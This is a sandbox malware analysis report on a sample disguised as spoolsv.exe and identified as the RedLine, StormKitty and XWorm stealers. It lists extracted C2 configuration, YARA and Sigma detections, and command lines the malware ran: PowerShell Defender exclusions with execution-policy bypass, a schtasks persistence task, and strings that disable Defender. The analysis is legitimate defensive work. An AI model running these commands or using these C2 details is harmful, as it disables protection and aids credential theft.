Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
spoolsv.exe

Overview

General Information

Sample name:spoolsv.exe
Analysis ID:1570972
MD5:fcfae4fdcc273f8a46c51d49fa8a4a03
SHA1:3a0e314b7bbdf5467df8b92a348c1b464fd502b0
SHA256:49ff687dbb13ed84815f3f57c660a0a4fc5cb21c82b605ce53338538a864586d
Tags:exeuser-aachum
Infos:

Detection

RedLine, StormKitty, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
Yara detected StormKitty Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes many files with high entropy
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • spoolsv.exe (PID: 4828 cmdline: "C:\Users\user\Desktop\spoolsv.exe" MD5: FCFAE4FDCC273F8A46C51D49FA8A4A03)
    • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WmiPrvSE.exe (PID: 7684 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'spoolsv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'spoolsv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 1916 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "spoolsv" /tr "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attzwu.exe (PID: 8096 cmdline: "C:\Users\user\AppData\Local\Temp\attzwu.exe" MD5: DFEFDD2E554FD23F3B87F68C3E0F9622)
  • spoolsv.exe (PID: 2040 cmdline: C:\Users\user~1\AppData\Local\Temp\spoolsv.exe MD5: FCFAE4FDCC273F8A46C51D49FA8A4A03)
  • spoolsv.exe (PID: 7656 cmdline: "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe" MD5: FCFAE4FDCC273F8A46C51D49FA8A4A03)
  • spoolsv.exe (PID: 5924 cmdline: "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe" MD5: FCFAE4FDCC273F8A46C51D49FA8A4A03)
  • spoolsv.exe (PID: 3968 cmdline: C:\Users\user~1\AppData\Local\Temp\spoolsv.exe MD5: FCFAE4FDCC273F8A46C51D49FA8A4A03)
  • spoolsv.exe (PID: 6212 cmdline: C:\Users\user~1\AppData\Local\Temp\spoolsv.exe MD5: FCFAE4FDCC273F8A46C51D49FA8A4A03)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["78.70.235.238", "f8terat.ddns.net"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "smss.exe", "Version": "XWorm V5.6"}

Threatname: RedLine

{"C2 url": ["78.70.235.238:1912"], "Bot Id": "l3monlogs", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
spoolsv.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    spoolsv.exeJoeSecurity_XWormYara detected XWormJoe Security
      spoolsv.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        spoolsv.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          spoolsv.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xf6a2:$s6: VirtualBox
          • 0xf600:$s8: Win32_ComputerSystem
          • 0x125a6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x12643:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x12758:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x11a26:$cnc4: POST / HTTP/1.1

          PCAP (Network Traffic)

          SourceRuleDescriptionAuthorStrings
          dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
            dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1256711418.0000000000BC2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                  00000000.00000000.1256711418.0000000000BC2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    00000000.00000000.1256711418.0000000000BC2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xf4a2:$s6: VirtualBox
                    • 0xf400:$s8: Win32_ComputerSystem
                    • 0x123a6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x12443:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x12558:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x11826:$cnc4: POST / HTTP/1.1
                    00000000.00000002.3715445075.00000000011C0000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
                    • 0x4811:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
                    • 0x4891:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x4916:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x6a9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x6b59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x6bd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x6da1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                    • 0x4daf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                    • 0x4e67:$s2: Set-MpPreference -DisableArchiveScanning $true
                    • 0x4f07:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
                    • 0x4fa5:$s4: Set-MpPreference -DisableScriptScanning $true
                    • 0x502f:$s5: Set-MpPreference -SubmitSamplesConsent 2
                    • 0x509d:$s6: Set-MpPreference -MAPSReporting 0
                    • 0x5115:$s7: Set-MpPreference -HighThreatDefaultAction 6
                    • 0x51b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
                    • 0x5241:$s9: Set-MpPreference -LowThreatDefaultAction 6
                    • 0x52cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6
                    • 0x5422:$e2: Add-MpPreference -ExclusionPath
                    0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 14 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.2.spoolsv.exe.11c0000.0.raw.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
                      • 0x4811:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
                      • 0x4891:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                      • 0x4916:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                      • 0x6a9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                      • 0x6b59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                      • 0x6bd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                      • 0x6da1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                      • 0x4daf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                      • 0x4e67:$s2: Set-MpPreference -DisableArchiveScanning $true
                      • 0x4f07:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
                      • 0x4fa5:$s4: Set-MpPreference -DisableScriptScanning $true
                      • 0x502f:$s5: Set-MpPreference -SubmitSamplesConsent 2
                      • 0x509d:$s6: Set-MpPreference -MAPSReporting 0
                      • 0x5115:$s7: Set-MpPreference -HighThreatDefaultAction 6
                      • 0x51b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
                      • 0x5241:$s9: Set-MpPreference -LowThreatDefaultAction 6
                      • 0x52cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6
                      • 0x5422:$e2: Add-MpPreference -ExclusionPath
                      0.2.spoolsv.exe.11c0000.0.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
                      • 0x2a11:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
                      • 0x2a91:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                      • 0x2b16:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                      • 0x4c9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                      • 0x4d59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                      • 0x4dd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                      • 0x4fa1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                      • 0x2faf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                      • 0x3067:$s2: Set-MpPreference -DisableArchiveScanning $true
                      • 0x3107:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
                      • 0x31a5:$s4: Set-MpPreference -DisableScriptScanning $true
                      • 0x322f:$s5: Set-MpPreference -SubmitSamplesConsent 2
                      • 0x329d:$s6: Set-MpPreference -MAPSReporting 0
                      • 0x3315:$s7: Set-MpPreference -HighThreatDefaultAction 6
                      • 0x33b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
                      • 0x3441:$s9: Set-MpPreference -LowThreatDefaultAction 6
                      • 0x34cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6
                      • 0x3622:$e2: Add-MpPreference -ExclusionPath
                      0.0.spoolsv.exe.bc0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        0.0.spoolsv.exe.bc0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                          0.0.spoolsv.exe.bc0000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                            Click to see the 2 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\spoolsv.exe, ProcessId: 4828, TargetFilename: C:\Users\user\AppData\Local\Temp\spoolsv.exe
                            Sigma detected: New RUN Key Pointing to Suspicious Folder
                            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user~1\AppData\Local\Temp\spoolsv.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\spoolsv.exe, ProcessId: 4828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\spoolsv.exe", ParentImage: C:\Users\user\Desktop\spoolsv.exe, ParentProcessId: 4828, ParentProcessName: spoolsv.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe', ProcessId: 7548, ProcessName: powershell.exe
                            Sigma detected: Script Interpreter Execution From Suspicious Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\spoolsv.exe", ParentImage: C:\Users\user\Desktop\spoolsv.exe, ParentProcessId: 4828, ParentProcessName: spoolsv.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe', ProcessId: 8024, ProcessName: powershell.exe
                            Sigma detected: Suspicious Script Execution From Temp Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\spoolsv.exe", ParentImage: C:\Users\user\Desktop\spoolsv.exe, ParentProcessId: 4828, ParentProcessName: spoolsv.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe', ProcessId: 8024, ProcessName: powershell.exe
                            Sigma detected: System File Execution Location Anomaly
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\Desktop\spoolsv.exe", CommandLine: "C:\Users\user\Desktop\spoolsv.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\spoolsv.exe, NewProcessName: C:\Users\user\Desktop\spoolsv.exe, OriginalFileName: C:\Users\user\Desktop\spoolsv.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user\Desktop\spoolsv.exe", ProcessId: 4828, ProcessName: spoolsv.exe
                            Sigma detected: Change PowerShell Policies to an Insecure Level
                            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\spoolsv.exe", ParentImage: C:\Users\user\Desktop\spoolsv.exe, ParentProcessId: 4828, ParentProcessName: spoolsv.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe', ProcessId: 7548, ProcessName: powershell.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\spoolsv.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\spoolsv.exe, ProcessId: 4828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv
                            Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\spoolsv.exe, ProcessId: 4828, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bslonm4d.r0v.ps1
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\spoolsv.exe", ParentImage: C:\Users\user\Desktop\spoolsv.exe, ParentProcessId: 4828, ParentProcessName: spoolsv.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe', ProcessId: 7548, ProcessName: powershell.exe
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\spoolsv.exe, ProcessId: 4828, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spoolsv.lnk
                            Sigma detected: Suspicious Schtasks From Env Var Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "spoolsv" /tr "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "spoolsv" /tr "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\spoolsv.exe", ParentImage: C:\Users\user\Desktop\spoolsv.exe, ParentProcessId: 4828, ParentProcessName: spoolsv.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "spoolsv" /tr "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe", ProcessId: 1916, ProcessName: schtasks.exe
                            Sigma detected: Use Short Name Path in Command Line
                            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\spoolsv.exe", ParentImage: C:\Users\user\Desktop\spoolsv.exe, ParentProcessId: 4828, ParentProcessName: spoolsv.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe', ProcessId: 8024, ProcessName: powershell.exe
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\spoolsv.exe", ParentImage: C:\Users\user\Desktop\spoolsv.exe, ParentProcessId: 4828, ParentProcessName: spoolsv.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe', ProcessId: 7548, ProcessName: powershell.exe

                            Persistence and Installation Behavior

                            barindex
                            Sigma detected: Schedule system process
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "spoolsv" /tr "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "spoolsv" /tr "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\spoolsv.exe", ParentImage: C:\Users\user\Desktop\spoolsv.exe, ParentProcessId: 4828, ParentProcessName: spoolsv.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "spoolsv" /tr "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe", ProcessId: 1916, ProcessName: schtasks.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-08T15:09:23.671143+010020432341A Network Trojan was detected78.70.235.2381912192.168.2.749975TCP
